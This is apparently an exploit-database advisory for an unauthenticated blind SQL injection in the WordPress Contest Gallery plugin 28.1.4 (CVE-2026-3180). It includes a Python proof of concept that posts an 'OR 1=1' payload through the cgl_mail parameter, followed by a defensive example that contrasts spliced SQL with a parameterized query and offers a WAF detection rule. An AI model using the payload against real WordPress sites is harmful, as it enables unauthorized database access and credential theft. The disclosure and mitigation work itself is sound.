WordPress Contest Gallery 28.1.4 – Unauthenticated Blind SQL Injection

Categories: WebApps

Overview

The WordPress Contest Gallery plugin version 28.1.4 is susceptible to an unauthenticated blind SQL injection vulnerability, identified as CVE-2026-3180. This security flaw allows attackers to execute arbitrary SQL queries against the underlying database without requiring authentication, potentially leading to unauthorized data access and manipulation.

Technical Details

This vulnerability arises from insufficient validation of user-supplied data in the plugin. A crafted request to the affected endpoint can carry SQL fragments that the database executes: by sending specially crafted parameters in the request, an attacker can use the flaw to retrieve sensitive information such as user credentials or configuration settings.

Once exploited, the attacker can leverage this access to perform various actions, including data extraction, data modification, or even complete database compromise. The blind nature of the SQL injection means that the attacker may not receive direct feedback from the database, but they can infer results based on the application’s behavior.

Impact

The potential consequences of this vulnerability are severe. An attacker could gain unauthorized access to sensitive information stored in the WordPress database, including user data, payment information, or even administrative credentials. This breach can lead to further attacks, such as account takeovers or complete site defacement, ultimately damaging the reputation and trustworthiness of the affected website.

Mitigation

To protect against CVE-2026-3180, it is crucial for site administrators to immediately update the WordPress Contest Gallery plugin to the latest version, where this vulnerability is patched. Regularly monitoring and updating all WordPress plugins is a best practice that can significantly reduce the attack surface.

Additionally, deploying a Web Application Firewall (WAF) can help detect and block SQL injection attempts. Security professionals should also conduct regular security audits and vulnerability assessments to identify and remediate weaknesses in their web applications. Educating users about the importance of strong authentication practices can further enhance security posture.

Proof of Concept (PoC)

poc.py
# Exploit Title: WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection
# Google Dork:  N/A
# Date: 2026-06-02
# Exploit Author: cardosource
# Vendor Homepage: https://contest-gallery.com/
# Software Link: https://wordpress.org/plugins/contest-gallery/
# Version: <= 28.1.4
# Tested on: Docker - PHP 8.2/Apache + MariaDB (WordPress Environment)
# CVE: 2026-3180


"""
Description

A Blind SQL Injection vulnerability exists in Contest Gallery versions 28.1.4 and earlier. The issue is caused by the unsafe use of the cgl_mail parameter, where sanitize_email() preserves the single quote (') character in the local part of an email address. As a result, user-controlled input reaches wpdb->get_row() without proper parameterization via prepare(), allowing unauthenticated attackers to perform boolean-based blind SQL injection.
Authentication Required: No

"""


import requests
import json

NONCE = " "
URL = "http://localhost:8080/wp-admin/admin-ajax.php"
endpoint = "/wp-admin/admin-ajax.php"
url = "http://localhost:8080/"
payload = "'OR/**/1=1#@teste.com' and 'OR/**/1=2#@teste.com"

def send_payload(mail):
    data = {
        "action": "post_cg1l_resend_unconfirmed_mail_frontend",
        "cgl_mail": mail,
        "cgl_page_id": "1",
        "cgl_activation_key": "",
        "cg_nonce": NONCE,
    }
    return requests.post(URL, data=data)

# One form-encoded POST with the boolean-true form of the payload; only the
# HTTP status and the body length are reported below.
r_true = send_payload("qualquer'OR/**/1=1#@teste.com")

# Record the status unconditionally so the banner never hits an undefined name
# when the response is not 200.
status_code = r_true.status_code

banner = f"""
CVE : 2026-3180 | Contest Gallery 28.1.4 : Boolean SQLi

payload :........................{payload}
end point :........................{endpoint}
url :..............................{url}
status :...........................{status_code}
nonce :............................{NONCE}
"""

print(banner)
print(f"Body length: {len(r_true.text)} chars")

# Command printed for the tester to inspect the table in the local test database.
poc = f'''\nmariadb wordpress_db -e "
SELECT * FROM wp_contest_gal1ery_create_user_entries 
ORDER BY Tstamp DESC LIMIT 1115;"'''

print(poc)
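The root cause stated in the PoC description above (sanitize_email() keeps the single quote, and the value reaches the query without prepare()) and the validation/WAF advice in the Mitigation section, as one added Python example that is not part of this advisory, the PoC, or the Contest Gallery plugin's code. It ports the local-part character filter from WordPress core's sanitize_email() (an assumption about core's behaviour, reconstructed from memory of the core source), shows that the page's own payload survives that filter unchanged, builds but never executes the spliced SQL text to show that the string literal boundary is broken, and contrasts that with a parameterized lookup (the sqlite3 "?" placeholder standing in for $wpdb->prepare() with "%s") against a constructed in-memory table. The table and column names, the strict email grammar used as a detection rule, and all helper names are assumptions.

```python
import re
import sqlite3

# Python port of the character class WordPress core's sanitize_email() applies
# to the part before the '@' (assumption: reconstructed from core, not from the
# plugin). Characters outside this set are stripped; everything inside survives.
_LOCAL_PART_DISALLOWED = re.compile(r"[^a-zA-Z0-9!#$%&'*+/=?^_`{|}~.-]")

# Constructed strict grammar for a sign-up form field: deliberately tighter than
# RFC 5322, so quotes, comment tokens and '=' are rejected outright.
_STRICT_EMAIL = re.compile(
    r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$"
)

# The boolean-true value from this page's PoC, used here only as test input.
PAGE_PAYLOAD = "qualquer'OR/**/1=1#@teste.com"


def sanitize_email_local_part(email: str) -> str:
    """Mimic what sanitize_email() does to the local part: drop characters that
    are not legal RFC 5322 'atext'. Note that ' # / * = all survive, because
    they are legal in a local part; this is an email cleaner, not an SQL escaper."""
    local, sep, domain = email.partition("@")
    return _LOCAL_PART_DISALLOWED.sub("", local) + sep + domain


def vulnerable_query(email: str) -> str:
    """Vulnerable pattern (hypothetical reconstruction of the bug class the
    advisory describes): the sanitized value is spliced into the SQL text, so a
    quote that survived sanitize_email() closes the literal early. The string is
    only built here, never executed; an odd quote count shows the broken literal."""
    clean = sanitize_email_local_part(email)
    return f"SELECT email FROM create_user_entries WHERE email = '{clean}'"


def is_suspicious_mail(email: str) -> bool:
    """Detection rule a WAF or request middleware could apply to the cgl_mail
    field: anything that is not a plain address under the strict grammar is
    flagged, which covers quotes, comment tokens and comparison operators."""
    return _STRICT_EMAIL.fullmatch(email) is None


def build_sample_db() -> sqlite3.Connection:
    """In-memory stand-in for the plugin's entries table (constructed schema/rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE create_user_entries (email TEXT, confirmed INTEGER)")
    conn.executemany(
        "INSERT INTO create_user_entries VALUES (?, ?)",
        [("alice@example.com", 0), ("bob@example.com", 1)],
    )
    conn.commit()
    return conn


def parameterized_lookup(conn: sqlite3.Connection, email: str):
    """Hardened pattern: bind the value as a parameter, the sqlite3 equivalent of
    $wpdb->prepare("... WHERE email = %s", $email). Whatever characters the input
    contains, it is compared as data and cannot change the query's structure, so
    the PoC payload simply matches no row."""
    return conn.execute(
        "SELECT email, confirmed FROM create_user_entries WHERE email = ?", (email,)
    ).fetchone()


if __name__ == "__main__":
    conn = build_sample_db()
    print("after sanitize_email():", sanitize_email_local_part(PAGE_PAYLOAD))
    print("spliced SQL text      :", vulnerable_query(PAGE_PAYLOAD))
    print("flagged by WAF rule   :", is_suspicious_mail(PAGE_PAYLOAD))
    print("parameterized lookup  :", parameterized_lookup(conn, PAGE_PAYLOAD))
    print("parameterized (legit) :", parameterized_lookup(conn, "alice@example.com"))
```

The point of the pairing is that sanitize_email() is doing its job correctly; it was never meant to make a value safe for SQL. The fix belongs in the query construction (prepare() with a placeholder), and the strict grammar is a second, independent layer for a WAF or form validator rather than a substitute for parameterization.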

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.